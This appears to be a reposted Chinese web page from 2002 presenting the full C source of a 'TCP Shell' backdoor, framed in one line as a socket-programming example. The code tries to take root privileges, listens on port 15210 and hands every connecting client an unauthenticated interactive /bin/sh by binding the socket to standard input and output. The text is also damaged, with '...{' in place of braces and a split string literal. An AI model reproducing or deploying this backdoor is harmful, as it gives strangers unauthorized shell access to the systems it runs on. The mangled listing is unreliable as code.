socket编程例子:TCP Shell后门

 

 来源:本文出自:http://sinbad.zhoubin.com 作者: 不详 (2002-12-12 06:02:00)

很简单很容易被发现，且当作socket编程例子学习吧。

/**//*============================================================================= 
   TCP Shell Version 1.00 
   The Shadow Penguin Security (http://shadowpenguin.backsection.net) 
   Written by UNYUN (unewn4th@usa.net) 
  ============================================================================= 
*/ 
#include <signal.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <errno.h> 
#include <unistd.h> 
#include <netinet/in.h> 
#include <limits.h> 
#include <netdb.h> 
#include <arpa/inet.h> 

#define MAX_CLIENTS     5           /* Max client num    */ 
#define PORT_NUM        15210       /* Port              */ 

void    get_connection(socket_type, port, listener) 
int     socket_type; 
int     port; 
int     *listener; 
...{ 
        struct sockaddr_in      address; 
        struct sockaddr_in      acc; 
        int                     listening_socket; 
        int                     connected_socket = -1; 
        int                     new_process; 
        int                     reuse_addr = 1; 
        int                     acclen=sizeof(acc); 

        memset((char *) &address, 0, sizeof(address)); 
        address.sin_family = AF_INET; 
        address.sin_port = htons(port); 
        address.sin_addr.s_addr = htonl(INADDR_ANY); 
        listening_socket = socket(AF_INET, socket_type, 0); 
        if (listening_socket < 0) ...{ 
          perror("socket"); 
          exit(1); 
        } 
        if (listener != NULL) *listener = listening_socket; 
        setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR, 
                   (void *)&reuse_addr,sizeof(reuse_addr)); 
        if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0 
)...{ 
          perror("bind"); 
          close(listening_socket); 
          exit(1); 
        } 
        if (socket_type == SOCK_STREAM)...{ 
          if (listen(listening_socket, MAX_CLIENTS)==-1)...{ 
            perror("listen"); 
            exit(1); 
         } 
        } 
} 
void    sock_puts(sockfd, str) 
int     sockfd; 
char    *str; 
...{ 
        char    x[2000],*buf; 
        size_t  bytes_sent = 0; 
        int     this_write,count; 

        sprintf(x," %s",str); 
        count=strlen(x); 
        buf=x; 
        while (bytes_sent < count) ...{ 
                do 
                        this_write = write(sockfd, buf, count - bytes_sent); 
                while ( (this_write < 0) && (errno == EINTR) ); 
                if (this_write <= 0) return; 
                bytes_sent += this_write; 
                buf += this_write; 
        } 
} 
int     main(argc, argv) 
int     argc; 
char    *argv[]; 
...{ 
        void            get_connection(); 
        void            sock_puts(); 
        int             i,sz; 
        int             sock; 
        static int      listensock = -1; 
        struct sockaddr_in sad; 

        setuid(0); 
        setgid(0); 

        for (;;)...{ 
          get_connection(SOCK_STREAM, PORT_NUM, &listensock); 
          sz=sizeof(struct sockaddr_in); 
          for (;;)...{ 
            if ((sock=accept(listensock,(void *)&sad,&sz))==-1)...{ 
                perror("Accept"); 
                exit(1); 
            } 
            if (fork()==0)...{ 
                sock_puts(sock,"The ShadowPenguin Systems Inc. TCP Shell 1.00 De 
veloped by  

UNYUN. "); 
                for (i=0;i<3;i++)...{ 
                    close(i); dup2(sock,i); 
                } 
                execl("/bin/sh","sh","-i",0); 
                close(sock);      
                break; 
            } 
          } 
        } 
}